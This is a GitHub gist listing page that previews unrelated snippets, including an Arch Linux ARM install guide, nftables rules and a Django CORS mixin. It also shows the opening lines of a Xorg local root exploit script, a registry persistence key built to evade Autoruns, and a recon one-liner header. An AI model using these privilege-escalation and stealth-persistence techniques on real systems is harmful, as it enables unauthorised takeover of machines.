Skip to content

Instantly share code, notes, and snippets.


Paweł Krawczyk kravietz

View GitHub Profile
larsch /
Created Oct 10, 2020
Installing Arch Linux AArch64 on the NanoPi R2S

Installing Arch Linux AArch64 on the NanoPi R2S

There is current no support for the NanoPi R2S in ArchLinuxArm, but it's possible to run it using the generic aarch64 installation.

Prepare sd-card/image

  1. Copy bootloader and uBoot from an armbian image using for the NanoPi R2S using dd (sectors 32 to 32767) everything before the partition, except the partition table).
  2. Create an ext4 partition on /dev/mmcblk0p1 at offset of 32768 sectors (16384 KiB):
Device         Boot Start      End  Sectors  Size Id Type
dwisiswant0 /
Last active Mar 17, 2021
St8out - Extra one-liner for reconnaissance
# St8out - Extra one-liner for reconnaissance
# Usage: ./
# Resources:
# -
Jonty /
Last active Jul 28, 2020
The earliest snapshot of every UK Government domain

Recently @alexparsons asked Democracy Club what the earliest local authority website was. Nobody knew, but we had fun looking at pages from 1996.

I pulled up my old IPv4 reverse DNS scan of domains, and the official list of domains, then queried the internet archive for each one.

The list below is every UK Government website sorted by the first time the Internet Archive saved a copy.

The links go to the archived version of the site at that time. Expect to get nostalgic. - @jonty

Archive date Domain
rjhansen /
Last active Apr 8, 2021
SKS Keyserver Network Under Attack

SKS Keyserver Network Under Attack

This work is released under a Creative Commons Attribution-NoDerivatives 4.0 International License.

Terminological Note

"OpenPGP" refers to the OpenPGP protocol, in much the same way that HTML refers to the protocol that specifies how to write a web page. "GnuPG", "SequoiaPGP", "OpenPGP.js", and others are implementations of the OpenPGP protocol in the same way that Mozilla Firefox, Google Chromium, and Microsoft Edge refer to software packages that process HTML data.

Who am I?

# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
ruario /
Last active Apr 4, 2021
A script that fetches a ChromeOS image for ARM32 and extracts the Widevine and Flash binaries, saving them in a compressed archive for use with Vivaldi

The included script '' fetches a ChromeOS image for ARM and extracts the Widevine and Flash binaries, saving them in a compressed archive. Since it downloads a fairly large file (2Gb+ on disk after download) it is recommended that you run the script on a machine that has plenty of disk space.

To install the resultant archive, issue the following on your ARM machine–after copying over the archive if needed:

sudo tar Cfx / widevine-flash-20200124_armhf.tgz

(Where 'widevine-flash-20200124_armhf.tgz' is updated to reflect the actual name of the created archive)

gaoyifan / tc-mark.nft
Created Sep 24, 2018
Traffic control mark with nftables
View tc-mark.nft
#! /usr/sbin/nft -f
chain tc-wan {
# check default priority
mark & 0xff0 == 0x130 ip dscp set af22 return
# real-time application
## Dota2
udp dport 27000-27200 \
meta mark set mark & 0xfffff00f ^ 0x110 ip dscp set af41 return
sapran /
Last active Jan 20, 2021
Links and snippets for mobile app pentesting workshop
hasherezade / test.reg
Last active Aug 24, 2020
Demo: persistence key not visible for sysinternals autoruns (in a default configuration - read more:
View test.reg
Windows Registry Editor Version 5.00
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\""
baxeico /
Last active Aug 6, 2020
Simple mixin to add CORS headers in a Django View
from django.http import HttpResponse
class AllowCORSMixin(object):
def add_access_control_headers(self, response):
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "X-Requested-With, Content-Type"